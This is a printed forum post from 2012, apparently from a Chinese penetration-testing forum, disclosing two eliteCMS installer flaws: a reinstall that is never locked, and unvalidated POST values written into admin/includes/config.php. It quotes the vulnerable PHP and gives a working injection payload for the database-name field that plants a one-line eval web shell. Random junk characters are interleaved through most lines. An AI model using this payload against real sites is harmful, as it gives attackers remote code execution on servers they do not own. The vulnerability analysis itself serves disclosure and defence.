中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
% d: t+ Z) w) i: c8 n& w' m- \# _' H* l; b$ ?7 [1 B
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
; |4 t+ {) K+ z3 d0 ~我们来看代码:! K" i, {. U  {
" s9 c$ [- r) y, i2 I. C- v2 j# m
..., u# L- c& A2 J, h
elseif ($_GET['step'] == "4") {, t- X5 Y* P: S& P
    $file = "../admin/includes/config.php";* z5 L/ u- Z& j. R3 u
    $write = "<?php\n";' F+ q' U' l. _' E' y
    $write .= "/**\n";
5 E  H9 [; r4 ^    $write .= "*\n";6 ?! m8 r$ V  C& G$ P+ ?, P4 f! [
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
3 C' ]7 l9 z0 k: a( S...略...
3 Z+ T! y0 {% x. i7 F! Z4 h0 s    $write .= "*\n";
$ t' F# Z4 v4 J2 N' j    $write .= "*/\n";
7 X, {' J+ b7 P- c    $write .= "\n";
; X" J0 P! p: P% k    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";* O7 R/ k& _8 d+ A
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";  P( X" y5 ]+ x2 z
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";- @/ P! ^& w" C
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";+ \( M5 ^4 |! Z* \0 H7 i2 y3 i
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";- ?0 k8 M, {$ U# ^: |
    $write .= "if (!\$connection) {\n";
: V* A$ X9 I# y/ X    $write .= "        die(\"Database connection failed\" .mysql_error());\n";1 w/ a6 b1 I  Z4 }  ?+ O2 U( I: h
    $write .= "        \n";
  Q0 C, A2 w" y7 ?9 K    $write .= "} \n";! p9 Q5 o$ o" q7 g2 N
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
* U# y- Z' H; R0 W; s2 |/ k! t    $write .= "if (!\$db_select) {\n";8 u# _- l7 _9 r* K& u/ y
    $write .= "        die(\"Database select failed\" .mysql_error());\n";9 t. F4 g" b6 }  k5 c( F
    $write .= "        \n";
& L( b; [0 n. }* j1 s    $write .= "} \n";( u9 S- F6 ~6 H0 M" Z
    $write .= "?>\n";* E5 d2 Q. G$ T9 H6 T; k+ @1 L8 k
6 P- z0 L/ y- I/ ]' q7 N. x# }/ {
    $writer = fopen($file, 'w');' j' l' G* v* y5 T/ u$ B
...3 G" d' Q2 K  b5 G6 {3 L; ?6 m
+ ]1 R$ r2 a. [4 E
在看代码:
0 Y! ]0 ]+ U- ]9 H2 c  M 9 }; O( u5 v  \1 i
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];- |6 P: h7 ^& C  z' W" B
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];4 d1 b3 G) f( V$ |/ J2 n
$_SESSION['DB_USER'] = $_POST['DB_USER'];7 T& k- J0 ~. W  G9 `
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];! e3 y' b. `$ B& M1 P

% ]; m6 W5 t2 n" d5 Z+ B取值未作任何验证
" E7 c0 i/ r9 U4 d- u+ g如果将数据库名POST数据:
6 v4 ~# ~- G* P+ p1 C % R3 {- h, u9 O9 P$ t  _
"?><?php eval($_POST[c]);?><?php0 X0 h3 F2 z$ m# ?

1 W, n0 Q% ~$ X/ i- o$ \' P将导致一句话后门写入/admin/includes/config.php9 g/ `* ]/ s- o( S+ }




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2